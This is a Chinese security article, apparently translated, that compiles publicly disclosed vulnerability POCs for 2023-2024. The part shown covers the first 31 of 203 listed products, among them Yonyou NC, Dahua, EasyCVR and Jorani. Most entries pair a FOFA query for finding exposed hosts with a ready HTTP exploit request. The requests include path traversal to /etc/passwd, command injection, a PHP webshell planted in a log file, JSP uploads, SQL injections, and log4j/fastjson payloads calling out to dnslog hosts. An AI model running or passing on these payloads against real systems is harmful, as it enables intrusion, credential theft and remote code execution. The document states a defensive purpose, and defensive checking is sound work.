Public Internet Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive security; we hope this article helps with your defense. Defenders can use the contents of this article for risk checks.

Vulnerability sources: This article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites on the internet and compiled and published by the 网络安全新视界 team.

Security patches: All vulnerabilities are public; for patches or remediation, contact the product vendor.

Article content: Due to length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the complete POC yourself if needed.

Legal rights: If the article content infringes any party's legal rights, contact the 网络安全新视界 team via the backend to have the relevant content removed.

Statement

To simplify things and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Table of Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <=20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC List

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default admin account, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the injected function executes a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Send the following request to the target lab to execute the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command string.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:1002
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
